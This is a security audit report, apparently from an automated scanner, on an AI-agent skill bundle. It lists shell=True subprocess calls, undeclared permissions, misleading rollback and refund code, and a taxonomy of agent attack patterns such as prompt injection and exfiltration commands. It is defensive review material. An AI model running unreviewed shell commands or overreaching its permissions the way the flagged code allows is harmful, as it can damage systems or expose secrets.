Security audit

agiza_agents

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real engineering skill bundle, but it grants agents broad command execution, autonomous code mutation, and local testing authority with some under-disclosed risks.

Install only if you are comfortable reviewing and controlling a powerful engineering automation bundle. Run it in disposable or sandboxed repositories, avoid exposing secrets or production credentials, review every eval/build/test command before execution, do not run the skill-tester against untrusted skills on your normal host, and treat generated database migrations as drafts requiring expert review before production use.

SkillSpector

By NVIDIA

Vulnerability Patterns

Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Behavioral ASTexec() Call, eval() Call, Dynamic Import
MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands

Findings (84)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: def run_eval_in_worktree(worktree_path, eval_cmd): """Run evaluation command in a worktree and return stdout.""" try: result = subprocess.run( eval_cmd, shell=True, capture_output=True, text=True, cwd=worktree_path, timeout=120 )
Confidence: 99% confidence
Finding: result = subprocess.run( eval_cmd, shell=True, capture_output=True, text=True, cwd=worktree_path, timeout=120 )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: # Build if needed if "BUILD_CMD" in dir() or "BUILD_CMD" in globals(): result = subprocess.run(BUILD_CMD, shell=True, capture_output=True) if result.returncode != 0: print(f"Build failed: {result.stderr.decode()[:200]}", file=sys.stderr) sys.exit(1)
Confidence: 97% confidence
Finding: result = subprocess.run(BUILD_CMD, shell=True, capture_output=True)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: if "DOCKER_IMAGE" in dir() or "DOCKER_IMAGE" in globals(): if "DOCKER_BUILD_CMD" in dir(): subprocess.run(DOCKER_BUILD_CMD, shell=True, capture_output=True) result = subprocess.run( f"docker image inspect {DOCKER_IMAGE} --format '{{{{.Size}}}}'", shell=True, capture_output=True, text=True )
Confidence: 96% confidence
Finding: result = subprocess.run( f"docker image inspect {DOCKER_IMAGE} --format '{{{{.Size}}}}'", shell=True, capture_output=True, text=True )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: # Measure if "DOCKER_IMAGE" in dir() or "DOCKER_IMAGE" in globals(): if "DOCKER_BUILD_CMD" in dir(): subprocess.run(DOCKER_BUILD_CMD, shell=True, capture_output=True) result = subprocess.run( f"docker image inspect {DOCKER_IMAGE} --format '{{{{.Size}}}}'", shell=True, capture_output=True, text=True
Confidence: 96% confidence
Finding: subprocess.run(DOCKER_BUILD_CMD, shell=True, capture_output=True)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: subprocess.run(CLEAN_CMD, shell=True, capture_output=True, timeout=60) t0 = time.perf_counter() result = subprocess.run(BUILD_CMD, shell=True, capture_output=True, timeout=600) elapsed = time.perf_counter() - t0 if result.returncode != 0:
Confidence: 96% confidence
Finding: result = subprocess.run(BUILD_CMD, shell=True, capture_output=True, timeout=600)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: for i in range(RUNS): # Clean if configured if CLEAN_CMD: subprocess.run(CLEAN_CMD, shell=True, capture_output=True, timeout=60) t0 = time.perf_counter() result = subprocess.run(BUILD_CMD, shell=True, capture_output=True, timeout=600)
Confidence: 95% confidence
Finding: subprocess.run(CLEAN_CMD, shell=True, capture_output=True, timeout=60)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: if system == "Linux": # Use /usr/bin/time for peak RSS result = subprocess.run( f"/usr/bin/time -v {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )
Confidence: 95% confidence
Finding: result = subprocess.run( f"/usr/bin/time -v {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: elif system == "Darwin": # macOS: use /usr/bin/time -l result = subprocess.run( f"/usr/bin/time -l {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )
Confidence: 95% confidence
Finding: result = subprocess.run( f"/usr/bin/time -l {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: TEST_CMD = "pytest tests/ --tb=no -q" # Test command # --- END CONFIG --- result = subprocess.run(TEST_CMD, shell=True, capture_output=True, text=True, timeout=300) output = result.stdout + "\n" + result.stderr # Try to parse pytest output: "X passed, Y failed, Z errors"
Confidence: 97% confidence
Finding: result = subprocess.run(TEST_CMD, shell=True, capture_output=True, text=True, timeout=300)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: t0 = time.time() try: with open(log_file, "w") as lf: result = subprocess.run( eval_cmd, shell=True, stdout=lf, stderr=subprocess.STDOUT, cwd=str(project_root),
Confidence: 98% confidence
Finding: result = subprocess.run( eval_cmd, shell=True, stdout=lf, stderr=subprocess.STDOUT, cwd=str(project_root), timeout=hard_limi

subprocess module call

Medium

Category: Dangerous Code Execution
Content: def run_cmd(cmd, cwd=None, timeout=None): """Run shell command, return (returncode, stdout, stderr).""" result = subprocess.run( cmd, shell=True, capture_output=True, text=True, cwd=cwd, timeout=timeout )
Confidence: 98% confidence
Finding: result = subprocess.run( cmd, shell=True, capture_output=True, text=True, cwd=cwd, timeout=timeout )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: try: # Try to run the script with no arguments (should not crash immediately) process = subprocess.run( [sys.executable, str(script_path)], capture_output=True, text=True,
Confidence: 96% confidence
Finding: process = subprocess.run( [sys.executable, str(script_path)], capture_output=True, text=True, timeout=self.timeout,

subprocess module call

Medium

Category: Dangerous Code Execution
Content: try: # Test --help flag process = subprocess.run( [sys.executable, str(script_path), '--help'], capture_output=True, text=True,
Confidence: 95% confidence
Finding: process = subprocess.run( [sys.executable, str(script_path), '--help'], capture_output=True, text=True, timeout=self.timeout

subprocess module call

Medium

Category: Dangerous Code Execution
Content: self.log_verbose(f"Testing with sample file: {sample_file.name}") # Try to run script with the sample file as input process = subprocess.run( [sys.executable, str(script_path), str(sample_file)], capture_output=True, text=True,
Confidence: 98% confidence
Finding: process = subprocess.run( [sys.executable, str(script_path), str(sample_file)], capture_output=True, text=True,

subprocess module call

Medium

Category: Dangerous Code Execution
Content: # Try running with --json flag if it looks like it supports it if '--json' in content: try: process = subprocess.run( [sys.executable, str(script_path), '--json', '--help'], capture_output=True, text=True,
Confidence: 93% confidence
Finding: process = subprocess.run( [sys.executable, str(script_path), '--json', '--help'], capture_output=True, text=

Lp3

Medium

Category: MCP Least Privilege
Confidence: 83% confidence
Finding: The skill advertises and instructs use of components that imply powerful capabilities such as file access, shell usage, network access, and MCP integration, but it does not declare any permissions or capability boundaries in the manifest. This creates a trust and review gap: downstream agents or users may invoke high-risk subskills without clear authorization expectations, increasing the chance of overprivileged execution or unsafe tool use.

Intent-Code Divergence

Medium

Confidence: 92% confidence
Finding: The skill gives broad instructions to read config, strategy, results, and git history, then later states the agent must never read or modify files outside the target file and program.md. This contradiction weakens safety boundaries because an autonomous agent may follow the earlier broader instructions and access more repository data than the constraint appears to permit, leading to unintended data exposure or policy bypass.

Context-Inappropriate Capability

Medium

Confidence: 97% confidence
Finding: The setup process executes an arbitrary user-supplied evaluation command during initialization. Because this occurs automatically as part of setup, a malicious or mistaken command can run code, alter files, access secrets available to the user, or perform network actions before the experiment even starts.

Intent-Code Divergence

Medium

Confidence: 97% confidence
Finding: The file-level documentation promises rollback scripts for all changes, but the implementation does not provide a real rollback for dropped tables. This mismatch is security-relevant because operators may trust the generated plan during production schema changes and discover too late that destructive steps are not recoverable, increasing risk of irreversible data loss during incidents or failed deployments.

Intent-Code Divergence

High

Confidence: 98% confidence
Finding: The zero-downtime claim is contradicted by the generated workflow for column modifications, which performs UPDATE of the full table, DROP COLUMN, and RENAME COLUMN operations directly. In real deployments these actions can lock large tables, break running application versions, and cause outages while the tool labels the strategy as zero-downtime, creating dangerous operator overconfidence.

Intent-Code Divergence

Medium

Confidence: 99% confidence
Finding: The drop-table rollback path returns only a placeholder comment instead of executable recovery SQL, despite surrounding claims that rollback support exists. This makes destructive migrations materially unsafe because a failed or mistaken deployment can leave operators without an actual recovery path after the table is removed.

Context-Inappropriate Capability

Medium

Confidence: 98% confidence
Finding: The sample dataset includes protected demographic attributes such as gender and ethnicity, along with pedigree-like fields such as university tier, in interview records for a hiring-related skill. Even as sample data, this normalizes collection and downstream use of sensitive attributes in evaluation pipelines, increasing the risk of discriminatory decision-making, biased model behavior, or accidental use in ranking and recommendations.

Intent-Code Divergence

Medium

Confidence: 92% confidence
Finding: The documentation presents conflicting safety guarantees: it states both that testing is 'sandboxed' and 'static analysis only' while elsewhere describing runtime execution of target scripts. For a tool that validates untrusted skills, this can cause operators to underestimate execution risk and run the tester in insufficiently isolated environments, increasing the chance of arbitrary code execution during validation.

Intent-Code Divergence

Medium

Confidence: 94% confidence
Finding: The file presents itself as a training example of bad patterns, but it still contains live HTTP calls to real Stripe, Square, and PayPal endpoints. In a sample-code or demo context, this mismatch is dangerous because a developer may run it assuming it is inert, causing unintended transmission of payment data or accidental interaction with production payment infrastructure.

Intent-Code Divergence

Medium

Confidence: 97% confidence
Finding: The refund function explicitly states it does not process refunds, yet it returns success and "Refund initiated." This can create security and integrity issues in payment operations: downstream systems or operators may believe funds were returned when they were not, leading to customer harm, reconciliation failures, and abuse opportunities.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal